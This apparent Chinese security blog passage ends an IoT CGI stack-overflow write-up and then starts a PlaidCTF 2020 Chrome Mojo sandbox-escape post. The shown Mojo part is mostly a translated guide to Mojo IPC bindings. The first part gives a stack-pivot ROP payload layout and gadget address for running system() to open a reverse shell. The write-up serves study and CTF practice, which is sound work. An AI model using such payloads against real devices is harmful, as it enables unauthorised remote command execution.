但是我们可以寻找lea rsp, [rsp+??] ; retn这样的gadaget来抬升栈，通过stack pivot来将rsp指到wd_login栈上的pwd_decoded字符串里，而这个字符串的值显然是我们可以任意控制，并且不受\x00截断影响，它是base64解出来的。

所以到这里我们就可以进行多次gadaget了。

即我们要让pwd_decoded字符串里的内容形如，即可

1	AAAAA * ? + p64(gadaget_addr1) + 需要的pop的寄存器值 + p64(gadaget_addr2) + 需要的pop的寄存器值 + p64(gadaget_addr3)...

然后由于一般的cgi程序里其实都会调很多system函数，所以我们只要再通过多次gadaget传递我们需要的命令到调用system函数的地方，最终执行该代码就可以反弹shell了。

但这个cgi程序里有个非常有趣的地方，就是00000000004039B7这个地址，它既有栈抬升，又有call system。

所以我们需要的payload就是A * 120 + p64(0x4039B7) + system_cmd_str即可。

解释一下，在溢出覆盖返回地址后，会跳到00000000004039B7去call一次无效的system命令，然后lea rsp, [rsp+108h]栈抬升，此时rsp指向我们在pwd_decoded里的p64(0x4039B7) + system_cmd_str字符串。

然后再retn，弹出p64返回地址，再次跳回到00000000004039B7执行，此时rsp指向的就是要执行的反弹shell字符串，并传给rdi，作为system的参数执行，此时就成功的反弹shell了。

.text:00000000004039B7                 lea     rdi, [rsp]
.text:00000000004039BB                 call    _system
.text:00000000004039C0                 xor     eax, eax
.text:00000000004039C2                 lea     rsp, [rsp+108h]
.text:00000000004039CA                 retn

具体的调试就留给读者权做练习了。

总结一下，iot的栈溢出，找gadaget的要点就是

栈抬升
- lea rsp, [rsp+?]
找system，传参劫持过去。

参考链接

https://www.crowdstrike.com/blog/pwn2own-tale-of-a-bug-found-and-lost-again/

chrome sandbox escape case study and plaidctf2020 mojo writeup

2020-09-20T15:18:59.687Z

chrome sandbox escape case study and plaidctf2020 mojo writeup

mojo

Intro to Mojo & Services

mojo术语

message pipe是一对endpoints，对应通信的两端，每个endpoint保存一个传入消息队列，并且在一端写入消息可以有效地传送到另一端，因此message pipe是双向的。
一个mojom文件描述一组interfaces，其代表的是强类型的消息集合。
给定一个mojom接口和一条message pipe，可以将其中一端指定为Remote，用来发送该接口描述的消息，另一端指定为Recevier，用来接收接口的消息。
注意:上面的概括有点过于简化。请记住，消息管道仍然是双向的，mojom message有可能期望得到response，response是从Receiver端点发送的，并由Remote接收。
Receiver端必须和mojom接口的具体实现(implementation)相绑定，从而将收到的消息分发给对应的接口实现函数。

定义一个新的Frame Interface

假设我们想从render frame向其对应在browser进程里的RenderFrameHostImpl发送一个“Ping”消息，我们需要去定义一个mojom interface，创建一个pipe去使用这个interface，然后绑定好pipe的两端以发送和接收消息。

定义一个interface

第一步是去创建一个.mojom文件

// src/example/public/mojom/ping_responder.mojom
module example.mojom;

interface PingResponder {
  // Receives a "Ping" and responds with a random integer.
  Ping() => (int32 random);
};

对应创建一个build rule去生成c++ bindings

# src/example/public/mojom/BUILD.gn
import("//mojo/public/tools/bindings/mojom.gni")
mojom("mojom") {
  sources = [ "ping_responder.mojom" ]
}

创建pipe

现在，让我们创建一个消息管道以使用此接口。通常，为了方便起见，在使用Mojo时，接口的client（即remote）通常是创建新pipe的一方。这很方便，因为可以使用Remote来立即发送消息，而无需等待InterfaceRequest端点被绑定到任何地方。

// src/third_party/blink/example/public/ping_responder.h
mojo::Remote ping_responder;
mojo::PendingReceiver receiver =
    ping_responder.BindNewPipeAndPassReceiver();

在此示例中，ping_responder是Remote，并且receiver是PendingReceiver，这是Receiver的前身。BindNewPipeAndPassReceiver是创建消息管道的最常见方法:它产生PendingReceiver作为返回值。
注意：一个PendingReceiver实际上不执行任何操作。它是单个消息管道端点的惰性持有者。它的存在只是为了使其端点在编译时具有更强的类型，这表明该端点希望被绑定到具体的接口类型。

发送message

最后，我们可以通过Remote调用我们的Ping()方法来发送消息：

1 2	// src/third_party/blink/example/public/ping_responder.h ping_responder->Ping(base::BindOnce(&OnPong));

重要说明：如果我们想接收response，则必须保持ping_responder对象处于活动状态直到OnPong被调用。毕竟，ping_responder拥有消息管道端点。如果它被销毁了，那么端点也将被销毁，将没有任何东西可以接收到响应消息。
我们快完成了！当然，如果一切都这么简单，那么该文档就不需要存在。我们已经解决了将消息从render进程发送到browser进程的难题，并将其转化为一个问题:
我们只要把上面的receiver object传递给browser进程，就可以让receiver来分发它收到的消息到具体的实现函数里。

发送PendingReceiver给Browser

值得注意的是，PendingReceivers（通常是消息管道端点）也是可以通过mojom消息自由发送的一种对象，将PendingReceiver放置在某处的最常见方法是将其作为方法参数传递给其他已经连接的接口。
将render里的RenderFrameImpl和其对应的RenderFrameHostImpl连接的interface是BrowserInterfaceBroker
这个interface是用来获取其他interface的factory，它的GetInterface方法接收一个GenericPendingReceiver（GenericPendingReceiver允许传递任意的interface receiver）

1
2
3

interface BrowserInterfaceBroker {
  GetInterface(mojo_base.mojom.GenericPendingReceiver receiver);
}

由于GenericPendingReceiver可以从任何PendingReceiver隐式构造，所以可以使用之前通过BindNewPipeAndPassReceiver创建的receiver来调用此方法：

1 2	RenderFrame* my_frame = GetMyFrame(); my_frame->GetBrowserInterfaceBroker().GetInterface(std::move(receiver));

这将传送PendingReceiver到browser进程里，并被BrowserInterfaceBroker接口的具体实现接收和处理。

实现interface

我们需要一个browser-side的PingResponder实现

#include "example/public/mojom/ping_responder.mojom.h"

class PingResponderImpl : example::mojom::PingResponder {
 public:
  // impl里保存receiver_
  explicit PingResponderImpl(mojo::PendingReceiver receiver)
      : receiver_(this, std::move(receiver)) {}

  // example::mojom::PingResponder:
  void Ping(PingCallback callback) override {
    // Respond with a random 4, chosen by fair dice roll.
    std::move(callback).Run(4);
  }

 private:
  mojo::Receiver receiver_;

  DISALLOW_COPY_AND_ASSIGN(PingResponderImpl);
};

RenderFrameHostImpl保存一个BrowserInterfaceBroker的实现，当此实现收到GetInterface方法调用时，它将调用先前为此特定接口注册的处理程序。

// render_frame_host_impl.h
class RenderFrameHostImpl
  ...
  void GetPingResponder(mojo::PendingReceiver receiver);
  ...
 private:
  ...
  std::unique_ptr ping_responder_;
  ...
    // BrowserInterfaceBroker implementation through which this
  // RenderFrameHostImpl exposes document-scoped Mojo services to the currently
  // active document in the corresponding RenderFrame.
  BrowserInterfaceBrokerImpl broker_{
      this};
  mojo::Receiver<blink::mojom::BrowserInterfaceBroker> broker_receiver_{
      &broker_};
};

// render_frame_host_impl.cc
// 可以看到GetPingResponder使用receiver构造出了一个PingResponderImpl对象
void RenderFrameHostImpl::GetPingResponder(
    mojo::PendingReceiver receiver) {
  ping_responder_ = std::make_unique(std::move(receiver));
}

// browser_interface_binders.cc
void PopulateFrameBinders(RenderFrameHostImpl* host,
                          mojo::BinderMap* map) {
...
  // Register the handler for PingResponder.
  map->Add(base::BindRepeating(
    &RenderFrameHostImpl::GetPingResponder, base::Unretained(host)));
}

我们完成了,此设置足以在renderer frame与其browser-side host之间建立新的接口连接！
假设我们在render中将ping_responder对象保持足够长的生命，我们最终将看到其OnPong回调将以参数4调用，如上面的browser端实现所定义。

Mojo Basics

Interfaces

同上，我们再看一组interface和它的impl
Mojo通过callback来返回result，即正常我们看到的是return一个返回值return_value，而mojo则是在最后调用callback(return_value)来返回result

module math.mojom;

interface Math {
  // Adds two int32s and returns the result as an int64 (to avoid
  // overflow issues).
  Add(int32 x, int32 y) => (int64 sum);
};
...
mojom("mojom") {
  sources = ["math.mojom"]
}
...
class MathImpl : public math::mojom::Math {
 public:
  explicit MathImpl(mojo::PendingReceiver receiver)
      : receiver_(this, std::move(receiver)) {}
  // math::mojom::Math overrides:
  // Note: AddCallback is a type alias for base::OnceCallback.
  // The parameters to the callback are the reply parameters specified in the
  // Mojo IDL method definition. This is part of the boilerplate generated by
  // Mojo: invoking |reply| will send a reply to the caller.
  void Add(int32_t x, int32_t y, AddCallback reply) override {
    // Note: Mojo always returns results via callback. While it is possible to
    // make a sync IPC which blocks on the reply, the handler will always return
    // the result via callback.
    std::move(reply).Run(static_cast<int64_t>(x) + y);
  }

 private:
  // Wraps a message pipe endpoint that receives incoming messages. See the
  // message pipes section below for more information.

  // wrap消息管道的receiver端
  mojo::Receiver receiver_;
};

Message Pipes

message pipe的两端已经在上面说过了，不再赘述

// Wraps a message pipe endpoint for making remote calls. May only be used on
// the sequence where the mojo::Remote was bound.
mojo::Remote remote_math = ...;
...
// 通常是保存在mojo impl里的一个类成员，wrap message pipe的receiver端，其分发ipc消息到具体的handler（典型的来说，就是发给this,也就是impl)，
// Usually a class member. Wraps a message pipe endpoint that receives incoming
// messages. Routes and dispatches IPCs to the handler—typically |this|—on the
// sequence where the mojo::Receiver was bound.
mojo::Receiver receiver_;

总之，作为结论，对于某一个interface，sender A可以向receiver B进行任意数量的call，而B则可以针对A的每一次call发送一个response给A处理，这就体现出了一种有限的双向通信。
Message Pipes可以使用下述方法创建

mojo::Remote::BindNewPipeAndPassReceiver

当sender/caller创建endpoint时使用。保留一个endpoint以发送IPC消息，另一端点作为未绑定的mojo::PendingReceiver返回，以便receiver/callee绑定到mojo::Receiver

mojo::Remote remote_math;

// BindNewPipeAndPassReceiver返回一个mojo::PendingReceiver.
// 这可以被bound到一个mojo::Receiver去处理来自remote_math的调用

// BindNewPipeAndPassReceiver() returns a
// mojo::PendingReceiver. This may be bound to a
// mojo::Receiver to handle calls received from
// |remote_math|.
LaunchAndBindRemoteMath(remote_math.BindNewPipeAndPassReceiver());

// remote_math可以立刻被使用，Add call消息将在receiving端排队，直到其被bound到一个mojo::Receiver.
// 例如，被mojom的impl使用其构造receive_字段以隐式绑定或者显式的通过::Bind来绑定。
// |remote_math| may be immediately used. The Add() call will be buffered by the
// receiving end and dispatched when mojo::PendingReceiver is
// bound to a mojo::Receiver.
remote_math->Add(2, 2, base::BindOnce(...));

mojo::Receiver::BindNewPipeAndPassRemote

在receiver/callee创建端点时使用。保留一个端点以接收IPC，另一个端点作为未绑定的mojo::PendingRemote返回，以使sender/caller方绑定到mojo::Remote。

class MathImpl : public math::mojom::MathImpl {
  // ...addition to the previous MathImpl definition...

  mojo::PendingRemote GetRemoteMath() {
    // BindNewPipeAndPassRemote() returns a
    // `mojo::PendingRemote`. This may be bound to a
    // `mojo::Remote which can be used to send IPCs that will
    // be handled by |this|.
    return receiver_.BindNewPipeAndPassRemote();
  }
};

mojo::PendingRemote::InitWithNewPipeAndPassReceiver

不太常见，类似于mojo::Remote::BindNewPipeAndPassReceiver()

mojo::Remote/mojo::Receiver and mojo::PendingRemote/mojo::PendingReceiver

mojo::Remote和mojo::Receiver都有相应的未绑定版本:这允许在同一进程中的sequences之间,甚至在IPC上的进程之间传递端点。

mojo::Remote remote = ...;
// |pending_remote| 是可移动的，并且可能会被传递。
// 未绑定时，端点不能用于发送IPC。pending_remote可以传递给mojo::Remote 构造函数或mojo::Remote::Bind()来重新绑定端点。
// |pending_remote| is movable and may be passed around. While unbound, the
// endpoint cannot be used to send IPCs. The pending remote may be passed to
// the mojo::Remote constructor or mojo::Remote::Bind() to rebind the
// endpoint.
mojo::PendingRemote pending_remote = remote.Unbind();

mojo::Receiver receiver = ...;
// |pending_receiver| is movable and may be passed around. While unbound,
// received IPCs are buffered and not processed. The pending receiver may be
// passed to the mojo::Receiver constructor or mojo::Receiver::Bind() to
// rebind the endpoint.
mojo::PendingReceiver pending_receiver = receiver.Unbind();

这里的bind和unbind实际上是通过在receiver里保存一个bind state对象来维护的，具体的不叙，可以参考具体代码

Mojo C++ Bindings API

Getting Started

//services/db/public/mojom/db.mojom
module db.mojom;

interface Table {
  AddRow(int32 key, string data);
};

interface Database {
  CreateTable(Table& table);
};
...
//services/db/public/mojom/BUILD.gn
import("//mojo/public/tools/bindings/mojom.gni")

mojom("mojom") {
  sources = [
    "db.mojom",
  ]
}
...
   deps += [ '//services/db/public/mojom' ]
...
运行ninja -C out/r services/db/public/mojom会生成
->
out/gen/services/db/public/mojom/db.mojom.cc
out/gen/services/db/public/mojom/db.mojom.h

你能在源码里包含上面生成的头文件，以使用其定义

#include "services/business/public/mojom/factory.mojom.h"

class TableImpl : public db::mojom::Table {
  // ...
};

本文档涵盖了Mojom IDL为C++使用者生成的各种定义，以及如何有效地使用它们,在消息管道之间进行通信。

Interfaces

Basic Usage

让我们看一下//sample/logger.mojom里定义的简单的接口，以及client如何使用他们去log simple string message。

module sample.mojom;

interface Logger {
  Log(string message);
};

通过binding generator将生成下面的定义

namespace sample {
namespace mojom {

class Logger {
  virtual ~Logger() {}

  virtual void Log(const std::string& message) = 0;
};

}  // namespace mojom
}  // namespace sample

Remote and PendingReceiver

Creating Interface Pipes

一种方法是手动创建pipe，并用强类型对象包装两端：

#include "sample/logger.mojom.h"

mojo::MessagePipe pipe;
mojo::Remote logger(
    mojo::PendingRemote(std::move(pipe.handle0), 0));
mojo::PendingReceiver receiver(std::move(pipe.handle1));

这很冗长，所以c++ binding库提供了更简便的方法来完成这件事。remote.h定义了BindNewPipeAndPassReceiver

1 2	mojo::Remote logger; auto receiver = logger.BindNewPipeAndPassReceiver());

这个代码和之前的等价。

绑定PendingRemote后，我们可以立即开始在其上调用Logger接口方法，该方法将立即将消息写入管道。这些消息将在管道的receiver排队，直到有人绑定到receiver并开始读取它们为止。

1	logger->Log("Hello!");

但是PendingReceiver本质上只是一个类型化的容器，用于容纳Remote管道的另一端（即接收端），直到将其绑定到接口的具体实现上。 PendingReceiver实际上除了保留管道端点并携带有用的编译时类型信息外，没有做任何其他事情。
因此该消息将永远存在于管道中。我们需要一种从管道的另一端读取消息并进行分发的方法。我们必须bind这个pending receiver

Binding a Pending Receiver

这有许多不同的helper类，用于binding message pipe的receiver端，其中最原始的是mojo::Receiver，mojo::Receiver将T的impl和单个的message pipe端点mojo::PendingReceiver绑定到一起，并监视是否有新消息发送过来。
每当bound pipe有新消息可读，Receiver都会安排一个task去读，反序列化消息并将其分发到其绑定的impl去。
下面是Logger接口的示例实现，注意，一般implement会own mojo::Receiver字段，这是一种常见的模式。因为绑定的implement必须比绑定它的任何mojo::Receiver存活的更久

#include "base/logging.h"
#include "base/macros.h"
#include "sample/logger.mojom.h"

class LoggerImpl : public sample::mojom::Logger {
 public:
  // NOTE: A common pattern for interface implementations which have one
  // instance per client is to take a PendingReceiver in the constructor.

  explicit LoggerImpl(mojo::PendingReceiver receiver)
      : receiver_(this, std::move(receiver)) {}
  ~Logger() override {}

  // sample::mojom::Logger:
  void Log(const std::string& message) override {
    LOG(ERROR) << "[Logger] " << message;
  }

 private:
  mojo::Receiver receiver_;

  DISALLOW_COPY_AND_ASSIGN(LoggerImpl);
};

现在我们可以使用PendingReceiver来构造出一个LoggerImpl,LoggerImpl impl(std::move(receiver));

Receiving Responses

一些mojom接口需要response，我们修改Logger接口，从而获取最后一个Log行。

module sample.mojom;

interface Logger {
  Log(string message);
  GetTail() => (string message);
};

现在生成的c++ interface是这样的

namespace sample {
namespace mojom {

class Logger {
 public:
  virtual ~Logger() {}

  virtual void Log(const std::string& message) = 0;

  using GetTailCallback = base::OnceCallback<void(const std::string& message)>;

  virtual void GetTail(GetTailCallback callback) = 0;
}

}  // namespace mojom
}  // namespace sample

和之前一样，此接口的client和implement对GetTail都使用相同的函数签名:implement使用callback参数去对请求进行响应，而client传递callback参数来异步接收响应，现在的implement是这样的:

class LoggerImpl : public sample::mojom::Logger {
 public:
  // NOTE: A common pattern for interface implementations which have one
  // instance per client is to take a PendingReceiver in the constructor.

  explicit LoggerImpl(mojo::PendingReceiver receiver)
      : receiver_(this, std::move(receiver)) {}
  ~Logger() override {}

  // sample::mojom::Logger:
  void Log(const std::string& message) override {
    LOG(ERROR) << "[Logger] " << message;
    lines_.push_back(message);
  }

  void GetTail(GetTailCallback callback) override {
    std::move(callback).Run(lines_.back());
  }

 private:
  mojo::Receiver receiver_;
  std::vector<std::string> lines_;

  DISALLOW_COPY_AND_ASSIGN(LoggerImpl);
};

现在client可以这样调用GetTail

void OnGetTail(const std::string& message) {
  LOG(ERROR) << "Tail was: " << message;
}

logger->GetTail(base::BindOnce(&OnGetTail));

Sending Interfaces Over Interfaces

我们知道如何创建接口管道,并以一些有趣的方式使用它们的Remote和PendingReceiver端点。这仍然不构成有趣的IPC!Mojo IPC的主要功能是能够跨其他接口传输接口端点，因此让我们看一下如何实现这一点。

Sending Pending Receivers

考虑如下Mojom

module db.mojom;

interface Table {
  void AddRow(int32 key, string data);
};

interface Database {
  AddTable(pending_receiver table);
};
pending_receiver
对应c++里的PendingReceiver类型，并且为这个mojom生成类似如下的代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
namespace db {
namespace mojom {

class Table {
 public:
  virtual ~Table() {}

  virtual void AddRow(int32_t key, const std::string& data) = 0;
}

class Database {
 public:
  virtual ~Database() {}

  virtual void AddTable(mojo::PendingReceiver table);
};

}  // namespace mojom
}  // namespace db
其对应的implemention如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include "sample/db.mojom.h"

class TableImpl : public db::mojom:Table {
 public:
  explicit TableImpl(mojo::PendingReceiver receiver)
      : receiver_(this, std::move(receiver)) {}
  ~TableImpl() override {}

  // db::mojom::Table:
  void AddRow(int32_t key, const std::string& data) override {
    rows_.insert({key, data});
  }

 private:
  mojo::Receiver receiver_;
  std::map<int32_t, std::string> rows_;
};

class DatabaseImpl : public db::mojom::Database {
 public:
  explicit DatabaseImpl(mojo::PendingReceiver receiver)
      : receiver_(this, std::move(receiver)) {}
  ~DatabaseImpl() override {}

  // db::mojom::Database:
  void AddTable(mojo::PendingReceiver table) {
    tables_.emplace_back(std::make_unique(std::move(table)));
  }

 private:
  mojo::Receiver receiver_;
  std::vector<std::unique_ptr> tables_;
};
pending_receiver
参数对应的是一个强类型的message pipe handle，当DatabaseImpl接收到一个AddTable消息时，它构造一个新的TableImpl实例，并且将其绑定到接收到的mojo::PendingReceiver
让我们看一下具体的用法
1
2
3
4
5
6
7
8
9
mojo::Remote database;
DatabaseImpl db_impl(database.BindNewPipeAndPassReceiver());

mojo::Remote table1, table2;
database->AddTable(table1.BindNewPipeAndPassReceiver());
database->AddTable(table2.BindNewPipeAndPassReceiver());

table1->AddRow(1, "hiiiiiiii");
table2->AddRow(2, "heyyyyyy");
请注意，即使它们的mojo::PendingReceiver端点仍在传输中，我们也可以立即立即开始使用新的Table管道。
Sending Remote
当然我们也可以发送Remotes
1
2
3
4
5
6
7
8
9
interface TableListener {
  OnRowAdded(int32 key, string data);
};

interface Table {
  AddRow(int32 key, string data);

  AddListener(pending_remote listener);
};
生成这样的代码
1
virtual void AddListener(mojo::PendingRemote listener) = 0;
使用起来是这样的
1
2
3
mojo::PendingRemote listener;
TableListenerImpl impl(listener.InitWithNewPipeAndPassReceiver());
table->AddListener(std::move(listener));
Other Interface Binding Types
Self-owned Receivers
self-owned的receiver作为一个独立的object存在，它拥有一个std::unique_ptr指向其绑定的interface implemention，并且在MessagePipe被关闭或者发生一些错误时，负责任的去delete implemention，所以其将一个interface implemention和MessagePipe绑定到了一起。
MakeSelfOwnedReceiver函数被用于创建这样的receiver
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
class LoggerImpl : public sample::mojom::Logger {
 public:
  LoggerImpl() {}
  ~LoggerImpl() override {}

  // sample::mojom::Logger:
  void Log(const std::string& message) override {
    LOG(ERROR) << "[Logger] " << message;
  }

 private:
  // NOTE: This doesn't own any Receiver object!
};

mojo::Remote logger;
mojo::MakeSelfOwnedReceiver(std::make_unique(),
                        logger.BindNewPipeAndPassReceiver());

logger->Log("NOM NOM NOM MESSAGES");
只要logger在系统中的某个位置保持open状态，在另一端绑定的LoggerImpl将存活。
Receiver Sets
在多个client共享同一个implement实例的时候使用。
1
2
3
4
5
6
7
8
9
module system.mojom;

interface Logger {
  Log(string message);
};

interface LoggerProvider {
  GetLogger(Logger& logger);
};
如此我们就可以使用ReceiverSet去绑定多个Looger pending receiver到单个implement实例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
class LogManager : public system::mojom::LoggerProvider,
                   public system::mojom::Logger {
 public:
  explicit LogManager(mojo::PendingReceiver receiver)
      : provider_receiver_(this, std::move(receiver)) {}
  ~LogManager() {}

  // system::mojom::LoggerProvider:
  void GetLogger(mojo::PendingReceiver receiver) override {
    logger_receivers_.Add(this, std::move(receiver));
  }

  // system::mojom::Logger:
  void Log(const std::string& message) override {
    LOG(ERROR) << "[Logger] " << message;
  }

 private:
  mojo::Receiver provider_receiver_;
  mojo::ReceiverSet logger_receivers_;
};
Remote Sets
同理，有时维护一组Remotes很有用，例如一组观察某些事件的client。
1
2
3
4
5
6
7
8
9
10
module db.mojom;

interface TableListener {
  OnRowAdded(int32 key, string data);
};

interface Table {
  AddRow(int32 key, string data);
  AddListener(pending_remote listener);
};
Table的实现可能是这样的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
class TableImpl : public db::mojom::Table {
 public:
  TableImpl() {}
  ~TableImpl() override {}

  // db::mojom::Table:
  void AddRow(int32_t key, const std::string& data) override {
    rows_.insert({key, data});
    listeners_.ForEach([key, &data](db::mojom::TableListener* listener) {
      listener->OnRowAdded(key, data);
    });
  }

  void AddListener(mojo::PendingRemote listener) {
    listeners_.Add(std::move(listener));
  }

 private:
  mojo::RemoteSet listeners_;
  std::map<int32_t, std::string> rows_;
};
Associated Interfaces
允许在message pipe上运行多个interface，同时保留message的顺序
使receiver可以从多个sequence访问单个message pipeMojom
引入新的类型pending_associated_remote和pending_associated_receiver1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
interface Bar {};

struct Qux {
  pending_associated_remote bar;
};

interface Foo {
  // Uses associated remote.
  PassBarRemote(pending_associated_remote bar);
  // Uses associated receiver.
  PassBarReceiver(pending_associated_receiver bar);
  // Passes a struct with associated interface pointer.
  PassQux(Qux qux);
  // Uses associated interface pointer in callback.
  AsyncGetBar() => (pending_associated_remote bar);
};
在每个interface impl/client将使用相同的message pipe，通过传递associated remote/receiver进行通信
Passing pending associated receivers
假设你已经有了一个Remote foo，你想要去call PassBarReceiver，你可以这样:
1
2
3
4
5
6
7
mojo::PendingAssociatedRemote pending_bar;
mojo::PendingAssociatedReceiver bar_receiver = pending_bar.InitWithNewEndpointAndPassReceiver();
foo->PassBarReceiver(std::move(bar_receiver));

mojo::AssociatedRemote bar;
bar.Bind(std::move(pending_bar));
bar->DoSomething();
首先代码创建一个Bar类型的associated interface，和之前我们创建的不同在于，associated的两端(bar_receiver和pending_bar)之一，必须通过另一个interface发送，这就是接口和现有message pipe关联的方式。
应该注意的是，在传递bar_receiver之前不能调用bar->DoSomething(),需要满足FIFO:
在接收方，当DoSomething调用的消息到达时，我们希望在处理任何后续消息之前将其分派到对应的AssociatedReceiver，如果bar_receiver在后续的消息里，那么消息调度就将陷入死锁。
另一方面，一旦发送了bar_receiver，bar就可以使用，而无须等待bar_receiver绑定到具体的implemention。
上面的代码也可以写成这样，包一层语法糖
1
2
3
mojo::AssociatedRemote bar;
foo->PassBarReceiver(bar.BindNewEndpointAndPassReceiver());
bar->DoSomething();
Foo的impl实现如下:
1
2
3
4
5
6
7
8
9
10
11
class FooImpl : public Foo {
  ...
  void PassBarReceiver(mojo::AssociatedReceiver bar) override {
    bar_receiver_.Bind(std::move(bar));
    ...
  }
  ...

  Receiver foo_receiver_;
  AssociatedReceiver bar_receiver_;
};
在这个例子里,bar_receiver_的生命周期和FooImpl息息相关，但是你不必这样做。
你可以将bar2传递到另一个序列，然后在那里绑定AssociatedReceiver。
Passing associated remotes
同理
1
2
3
4
5
mojo::AssociatedReceiver bar_receiver(some_bar_impl);
mojo::PendingAssociatedRemote bar;
mojo::PendingAssociatedReceiver bar_pending_receiver = bar.InitWithNewEndpointAndPassReceiver();
foo->PassBarRemote(std::move(bar));
bar_receiver.Bind(std::move(bar_pending_receiver));
1
2
3
4
mojo::AssociatedReceiver bar_receiver(some_bar_impl);
mojo::PendingAssociatedRemote bar;
bar_receiver.Bind(bar.InitWithNewPipeAndPassReceiver());
foo->PassBarRemote(std::move(bar));
Mojo JavaScript Bindings API
Getting Started
bindings API被定义在mojo namespace里，其实现在mojo_bindings.js
当bindings generator处理mojom IDL文件时，将会生成对应的mojom.js文件。
假设我们创建一个//services/echo/public/interfaces/echo.mojom文件和//services/echo/public/interfaces/BUILD.gn
1
2
3
4
5
module test.echo.mojom;

interface Echo {
  EchoInteger(int32 value) => (int32 result);
};
1
2
3
4
5
6
7
import("//mojo/public/tools/bindings/mojom.gni")

mojom("interfaces") {
  sources = [
    "echo.mojom",
  ]
}
通过构建如下生成target，来生成bindings。
foo_js JavaScript bindings; 被用在compile-time dependency.
foo_js_data_deps JavaScript bindings; 被用在run-time dependency.
如果我们编译这个target,这将生成几个source file
1
ninja -C out/r services/echo/public/interfaces:interfaces_js
其中与js binding相关的是
1
out/gen/services/echo/public/interfaces/echo.mojom.js
为了使用echo.mojom中的定义，您将需要使用